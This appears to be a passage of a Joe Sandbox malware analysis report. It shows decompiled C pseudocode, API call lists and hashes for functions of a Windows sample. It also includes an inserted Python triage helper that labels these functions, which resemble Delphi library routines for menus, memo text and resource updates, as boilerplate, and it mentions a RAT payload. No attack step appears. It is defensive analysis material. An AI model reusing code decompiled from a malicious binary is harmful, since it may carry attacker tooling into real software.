                                                    							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                                    							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                                    						}
                                                    					}
                                                    					goto L12;
                                                    				}
                                                    			}
                                                    Instruction addresses, one per statement line of the C-Code above, in order: 0x004534ec, 0x004534ec, 0x004534ed, 0x004534f4, 0x004534fa, 0x00453501, 0x00453502, 0x00453507, 0x0045350a, 0x00453512, 0x0045351d, 0x00453528, 0x0045352e, 0x00453530, 0x0045353a, 0x00453545, 0x00453554, 0x004536b6, 0x004536b9, 0x004536bf, 0x004536c1, 0x004536c8, 0x004536c8, 0x004536d0, 0x004536d6, 0x004536d8, 0x004536df, 0x004536df, 0x004536e7, 0x004536ed, 0x004536f3, 0x004536f5, 0x00453704, 0x00453716, 0x00453716, 0x00453727, 0x0045372e, 0x00453731, 0x00453734, 0x00453741, 0x0045356a, 0x00453574, 0x0045357f, 0x00453588, 0x00453594, 0x004535b4, 0x004535b4, 0x00453588, 0x004535b9, 0x004535c4, 0x004535d2, 0x004535d7, 0x004535dd, 0x004535df, 0x004535e5, 0x004535ee, 0x00453601, 0x00453610, 0x0045362f, 0x0045362f, 0x0045363f, 0x0045365e, 0x0045365e, 0x0045366e, 0x0045368d, 0x004536b0, 0x004536b0, 0x0045366e, 0x00000000, 0x004535df

                                                    APIs
                                                    • MulDiv.KERNEL32(00000000,?,00000000), ref: 004535AB
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                    • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				long _t27;
                                                    				long _t34;
                                                    				int _t42;
                                                    				int _t43;
                                                    				intOrPtr _t50;
                                                    				int _t54;
                                                    				void* _t57;
                                                    				void* _t60;
                                                    
                                                    				_v12 = 0;
                                                    				_v8 = __ecx;
                                                    				_t54 = __edx;
                                                    				_t57 = __eax;
                                                    				_push(_t60);
                                                    				_push(0x434993);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t60 + 0xfffffff8;
                                                    				if(__edx >= 0) {
                                                    					_t42 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
                                                    					if(_t42 < 0) {
                                                    						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
                                                    						if(_t43 >= 0) {
                                                    							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
                                                    							if(_t27 != 0) {
                                                    								_t42 = _t43 + _t27;
                                                    								E00404CCC( &_v12, _v8, 0x4349ac);
                                                    								goto L6;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						E00404CCC( &_v12, 0x4349ac, _v8);
                                                    						L6:
                                                    						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
                                                    						_t34 = E00404E80(_v12);
                                                    						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
                                                    					}
                                                    				}
                                                    				_pop(_t50);
                                                    				 *[fs:eax] = _t50;
                                                    				_push(0x43499a);
                                                    				return E004049C0( &_v12);
                                                    			}

                                                    0x004348b3
                                                    0x004348b6
                                                    0x004348b9
                                                    0x004348bb
                                                    0x004348bf
                                                    0x004348c0
                                                    0x004348c5
                                                    0x004348c8
                                                    0x004348cd
                                                    0x004348e9
                                                    0x004348ed
                                                    0x00434918
                                                    0x0043491c
                                                    0x0043492f
                                                    0x00434936
                                                    0x00434938
                                                    0x00434945
                                                    0x00000000
                                                    0x00434945
                                                    0x00434936
                                                    0x004348ef
                                                    0x004348fa
                                                    0x0043494a
                                                    0x0043495a
                                                    0x00434962
                                                    0x00434978
                                                    0x00434978
                                                    0x004348ed
                                                    0x0043497f
                                                    0x00434982
                                                    0x00434985
                                                    0x00434992

                                                    APIs
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913
                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F
                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A
                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                    • Opcode Fuzzy Hash: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

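The function record above is worth reading against the message IDs it sends: 0xBB is EM_LINEINDEX, 0xC1 is EM_LINELENGTH, 0xB1 is EM_SETSEL and 0xC2 is EM_REPLACESEL, and that exact sequence (line index, fall back to previous line plus its length, set selection, replace selection with a CR/LF-joined string) is the Delphi VCL TMemoStrings.Insert routine, i.e. library code compiled into the dropped Delphi stage rather than the RAT payload. The following is an added triage helper written for this page, not code from the report or the sample: it parses the "APIs" bullet lines in the format Joe Sandbox renders them here (the bullet-and-`ref:` layout is taken from this page; the regex is the editor's), resolves the uMsg argument of each SendMessageA call against the standard winuser.h edit-control constants, and checks for the insert idiom so the function can be tagged as VCL boilerplate during review. The sample input is copied from the record above.

```python
import re

# Standard edit-control window messages (values from winuser.h).
EDIT_MESSAGES = {
    0xB0: "EM_GETSEL",
    0xB1: "EM_SETSEL",
    0xBB: "EM_LINEINDEX",
    0xC1: "EM_LINELENGTH",
    0xC2: "EM_REPLACESEL",
}

# Ordered SendMessage pattern of Delphi's TMemoStrings.Insert
# (EM_LINEINDEX ... EM_LINELENGTH ... EM_SETSEL ... EM_REPLACESEL).
MEMO_INSERT_IDIOM = ["EM_LINEINDEX", "EM_LINELENGTH", "EM_SETSEL", "EM_REPLACESEL"]

# One "APIs" line as rendered in this report, e.g.
#   • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
# The bullet is optional so the parser also accepts copied-out lines without it.
API_LINE = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# API lines copied from the E004348A8 record on this page.
SAMPLE_API_LINES = [
    "• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4",
    "• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913",
    "• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F",
    "• SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A",
    "• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978",
]


def parse_api_line(line):
    """Split one report API line into api name, module, argument list and call site."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),
    }


def resolve_message(call):
    """For SendMessageA calls, name the uMsg (second) argument; '?' means unresolved."""
    if call["api"] != "SendMessageA" or len(call["args"]) < 2:
        return None
    msg_arg = call["args"][1]
    if msg_arg == "?":
        return "unknown"
    msg = int(msg_arg, 16)
    return EDIT_MESSAGES.get(msg, "0x%X" % msg)


def summarize(lines):
    """Return (call-site address, message name) for every parsable line."""
    calls = [c for c in map(parse_api_line, lines) if c]
    return [(c["ref"], resolve_message(c)) for c in calls]


def is_memo_insert_idiom(lines):
    """True if the messages contain the TMemoStrings.Insert sequence as an ordered subsequence."""
    names = iter(n for _, n in summarize(lines))
    return all(want in names for want in MEMO_INSERT_IDIOM)


if __name__ == "__main__":
    for ref, name in summarize(SAMPLE_API_LINES):
        print("0x%08X  %s" % (ref, name))
    print("VCL TMemoStrings.Insert idiom:", is_memo_insert_idiom(SAMPLE_API_LINES))
```

Functions whose API list matches this idiom (or the GetMenu/SetMenu pair in the TCustomForm.SetMenu routine that follows) can be skipped when hunting for the injection and persistence logic flagged in the report summary; the subsequence check rather than an exact match keeps it robust to the extra EM_LINEINDEX retry the decompiler shows.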
                                                    C-Code - Quality: 89%
                                                    			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				void* _t41;
                                                    				void* _t54;
                                                    				void* _t61;
                                                    				struct HMENU__* _t64;
                                                    				struct HMENU__* _t70;
                                                    				intOrPtr _t77;
                                                    				void* _t79;
                                                    				intOrPtr _t81;
                                                    				intOrPtr _t83;
                                                    				intOrPtr _t87;
                                                    				void* _t92;
                                                    				intOrPtr _t98;
                                                    				void* _t111;
                                                    				intOrPtr _t113;
                                                    				void* _t116;
                                                    
                                                    				_t109 = __edi;
                                                    				_push(__edi);
                                                    				_v20 = 0;
                                                    				_t113 = __edx;
                                                    				_t92 = __eax;
                                                    				_push(_t116);
                                                    				_push(0x454c0a);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t116 + 0xfffffff0;
                                                    				if(__edx == 0) {
                                                    					L7:
                                                    					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                    					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                    						E0044E3BC(_t39, 0, _t109, 0);
                                                    					}
                                                    					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                    						_t113 = 0;
                                                    					}
                                                    					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                    					if(_t113 != 0) {
                                                    						E00421C0C(_t113, _t92);
                                                    					}
                                                    					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                    						_t41 = E00441A08(_t92);
                                                    						__eflags = _t41;
                                                    						if(_t41 != 0) {
                                                    							SetMenu(E00441704(_t92), 0); // executed
                                                    						}
                                                    						goto L30;
                                                    					} else {
                                                    						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                    							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                    								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                    								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                    									_t54 = E00441A08(_t92);
                                                    									__eflags = _t54;
                                                    									if(_t54 != 0) {
                                                    										SetMenu(E00441704(_t92), 0);
                                                    									}
                                                    								}
                                                    								goto L30;
                                                    							}
                                                    							goto L21;
                                                    						} else {
                                                    							L21:
                                                    							if(E00441A08(_t92) != 0) {
                                                    								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                    								_t110 = _t61;
                                                    								_t64 = GetMenu(E00441704(_t92));
                                                    								_t138 = _t61 - _t64;
                                                    								if(_t61 != _t64) {
                                                    									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                    									SetMenu(E00441704(_t92), _t70);
                                                    								}
                                                    								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
                                                    							}
                                                    							L30:
                                                    							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                    								E00455B08(_t92, 1);
                                                    							}
                                                    							E0045497C(_t92);
                                                    							_pop(_t98);
                                                    							 *[fs:eax] = _t98;
                                                    							_push(0x454c11);
                                                    							return E004049C0( &_v20);
                                                    						}
                                                    					}
                                                    				}
                                                    				_t77 =  *0x49ebbc; // 0x0
                                                    				_t79 = E00458274(_t77) - 1;
                                                    				if(_t79 >= 0) {
                                                    					_v8 = _t79 + 1;
                                                    					_t111 = 0;
                                                    					do {
                                                    						_t81 =  *0x49ebbc; // 0x0
                                                    						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
                                                    							_t83 =  *0x49ebbc; // 0x0
                                                    							if(_t92 != E00458260(_t83, _t111)) {
                                                    								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                    								_v12 = 0xb;
                                                    								_t87 =  *0x49d8b4; // 0x423118
                                                    								E00406A70(_t87,  &_v20);
                                                    								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                    								E00404378();
                                                    							}
                                                    						}
                                                    						_t111 = _t111 + 1;
                                                    						_t10 =  &_v8;
                                                    						 *_t10 = _v8 - 1;
                                                    					} while ( *_t10 != 0);
                                                    				}
                                                    			}

                                                    0x00454a44
                                                    0x00454a4c
                                                    0x00454a4f
                                                    0x00454a52
                                                    0x00454a54
                                                    0x00454a58
                                                    0x00454a59
                                                    0x00454a5e
                                                    0x00454a61
                                                    0x00454a66
                                                    0x00454ad8
                                                    0x00454ad8
                                                    0x00454ae0
                                                    0x00454ae4
                                                    0x00454ae4
                                                    0x00454aed
                                                    0x00454af9
                                                    0x00454af9
                                                    0x00454afb
                                                    0x00454b03
                                                    0x00454b09
                                                    0x00454b09
                                                    0x00454b10
                                                    0x00454bc3
                                                    0x00454bc8
                                                    0x00454bca
                                                    0x00454bd6
                                                    0x00454bd6
                                                    0x00000000
                                                    0x00454b29
                                                    0x00454b33
                                                    0x00454b42
                                                    0x00454b9c
                                                    0x00454ba3
                                                    0x00454ba7
                                                    0x00454bac
                                                    0x00454bae
                                                    0x00454bba
                                                    0x00454bba
                                                    0x00454bae
                                                    0x00000000
                                                    0x00454ba3
                                                    0x00000000
                                                    0x00454b44
                                                    0x00454b44
                                                    0x00454b4d
                                                    0x00454b5b
                                                    0x00454b5e
                                                    0x00454b68
                                                    0x00454b6d
                                                    0x00454b6f
                                                    0x00454b79
                                                    0x00454b85
                                                    0x00454b85
                                                    0x00454b95
                                                    0x00454b95
                                                    0x00454bdb
                                                    0x00454be2
                                                    0x00454be8
                                                    0x00454be8
                                                    0x00454bef
                                                    0x00454bf6
                                                    0x00454bf9
                                                    0x00454bfc
                                                    0x00454c09
                                                    0x00454c09
                                                    0x00454b33
                                                    0x00454b10
                                                    0x00454a68
                                                    0x00454a72
                                                    0x00454a75
                                                    0x00454a78
                                                    0x00454a7b
                                                    0x00454a7d
                                                    0x00454a7f
                                                    0x00454a8f
                                                    0x00454a93
                                                    0x00454a9f
                                                    0x00454aa4
                                                    0x00454aa7
                                                    0x00454ab4
                                                    0x00454ab9
                                                    0x00454ac8
                                                    0x00454acd
                                                    0x00454acd
                                                    0x00454a9f
                                                    0x00454ad2
                                                    0x00454ad3
                                                    0x00454ad3
                                                    0x00454ad3
                                                    0x00454a7d

                                                    APIs
                                                    • GetMenu.USER32(00000000), ref: 00454B68
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                    • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$LoadString
                                                    • String ID:
                                                    • API String ID: 3688185913-0
                                                    • Opcode ID: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                    • Opcode Fuzzy Hash: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                      • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                      • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                      • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,022F0000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                    • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                    • String ID: 7
                                                    • API String ID: 2227675388-1331172448
                                                    • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                    • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                    • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                    • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E0042C5E4(int _a4) {
                                                    				void* __ebx;
                                                    				void* __ebp;
                                                    				signed int _t2;
                                                    				signed int _t3;
                                                    				void* _t7;
                                                    				int _t8;
                                                    				void* _t12;
                                                    				void* _t13;
                                                    				void* _t17;
                                                    				void* _t18;
                                                    
                                                    				_t8 = _a4;
                                                    				if( *0x49e928 == 0) {
                                                    					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
                                                    					_t7 =  *0x49e900(_t8); // executed
                                                    					return _t7;
                                                    				}
                                                    				_t3 = _t2 | 0xffffffff;
                                                    				_t12 = _t8 + 0xffffffb4 - 2;
                                                    				__eflags = _t12;
                                                    				if(__eflags < 0) {
                                                    					_t3 = 0;
                                                    				} else {
                                                    					if(__eflags == 0) {
                                                    						_t8 = 0;
                                                    					} else {
                                                    						_t13 = _t12 - 1;
                                                    						__eflags = _t13;
                                                    						if(_t13 == 0) {
                                                    							_t8 = 1;
                                                    						} else {
                                                    							__eflags = _t13 - 0xffffffffffffffff;
                                                    							if(_t13 - 0xffffffffffffffff < 0) {
                                                    								_t3 = 1;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				__eflags = _t3 - 0xffffffff;
                                                    				if(_t3 != 0xffffffff) {
                                                    					return _t3;
                                                    				} else {
                                                    					return GetSystemMetrics(_t8);
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C646
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                    • String ID: GetSystemMetrics
                                                    • API String ID: 54681038-96882338
                                                    • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                    • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 62%
                                                    			E00474B04(intOrPtr __eax, void* __ebx, char __ecx, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				char _v13;
                                                    				void* _v20;
                                                    				intOrPtr _v24;
                                                    				void* _t33;
                                                    				int _t45;
                                                    				char _t48;
                                                    				void* _t53;
                                                    				intOrPtr _t61;
                                                    				intOrPtr _t63;
                                                    				void* _t67;
                                                    				void* _t68;
                                                    				intOrPtr _t69;
                                                    
                                                    				_t67 = _t68;
                                                    				_t69 = _t68 + 0xffffffec;
                                                    				_v12 = __ecx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t67);
                                                    				_push(0x474bff);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t69;
                                                    				_v24 = E00409A7C(_v8);
                                                    				E00409A90(_v8, 0x80);
                                                    				_t33 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
                                                    				_t53 = _t33;
                                                    				_v13 = _t53 != 0;
                                                    				if(_v13 == 0) {
                                                    					E00409A90(_v8, _v24);
                                                    					_pop(_t61);
                                                    					 *[fs:eax] = _t61;
                                                    					_push(0x474c06);
                                                    					return E004049E4( &_v12, 2);
                                                    				} else {
                                                    					_push(_t67);
                                                    					_push(0x474bd2);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t69;
                                                    					_v20 = E0040275C(0);
                                                    					_t45 = UpdateResourceA(_t53, 0xa, E00404E80(_v12), 0, _v20, 0);
                                                    					asm("sbb eax, eax");
                                                    					_v13 = _t45 + 1;
                                                    					if(EndUpdateResourceA(_t53, 0) == 0 || _v13 == 0) {
                                                    						_t48 = 0;
                                                    					} else {
                                                    						_t48 = 1;
                                                    					}
                                                    					_v13 = _t48;
                                                    					_pop(_t63);
                                                    					 *[fs:eax] = _t63;
                                                    					_push(0x474bd9);
                                                    					return E0040277C(_v20);
                                                    				}
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00409A7C: GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    • BeginUpdateResourceA.KERNEL32 ref: 00474B53
                                                    • UpdateResourceA.KERNEL32 ref: 00474B93
                                                    • EndUpdateResourceA.KERNEL32 ref: 00474BA4
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$AttributesFile$BeginErrorLast
                                                    • String ID:
                                                    • API String ID: 3622334292-0
                                                    • Opcode ID: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction ID: 52e1684931c8bafc800cdd43f2787b7e22df09697c22c7a3fc8d55225dfd733d
                                                    • Opcode Fuzzy Hash: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction Fuzzy Hash: A6216470B04244AFDB01EBB5DC42BAEB7A9EB45704F5144BBF404F2691D778AE10D658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004015B4(void* __eax, void** __edx) {
                                                    				void* _t3;
                                                    				void** _t8;
                                                    				void* _t11;
                                                    				long _t14;
                                                    
                                                    				_t8 = __edx;
                                                    				if(__eax >= 0x100000) {
                                                    					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                    				} else {
                                                    					_t14 = 0x100000;
                                                    				}
                                                    				_t8[1] = _t14;
                                                    				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                    				_t11 = _t3;
                                                    				 *_t8 = _t11;
                                                    				if(_t11 != 0) {
                                                    					_t3 = E00401468(0x49e5ec, _t8);
                                                    					if(_t3 == 0) {
                                                    						VirtualFree( *_t8, 0, 0x8000);
                                                    						 *_t8 = 0;
                                                    						return 0;
                                                    					}
                                                    				}
                                                    				return _t3;
                                                    			}

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID: I
                                                    • API String ID: 2087232378-1966777607
